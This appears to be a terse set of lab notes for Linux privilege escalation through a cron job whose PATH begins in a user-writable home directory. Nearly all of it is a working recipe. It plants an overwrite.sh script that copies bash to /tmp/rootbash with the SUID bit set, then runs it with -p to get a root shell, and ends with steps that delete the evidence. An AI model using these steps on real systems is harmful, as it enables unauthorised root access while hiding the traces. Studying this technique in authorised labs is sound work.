cat /etc/crontab

Note that the PATH variable starts with /home/user which is our user's home directory.

=================================================================================================================

Create a file called overwrite.sh in your home directory with the following contents:

#!/bin/bash

cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash

=================================================================================================================

Make sure that the file is executable:

chmod +x /home/user/overwrite.sh

####wait for one min then 
=================================================================================================================

Run the /tmp/rootbash command with -p to gain a shell running with root privileges:

/tmp/rootbash -p

==================================================================================================================

rm /tmp/rootbash
exit
####after work delete this file while in root shell.
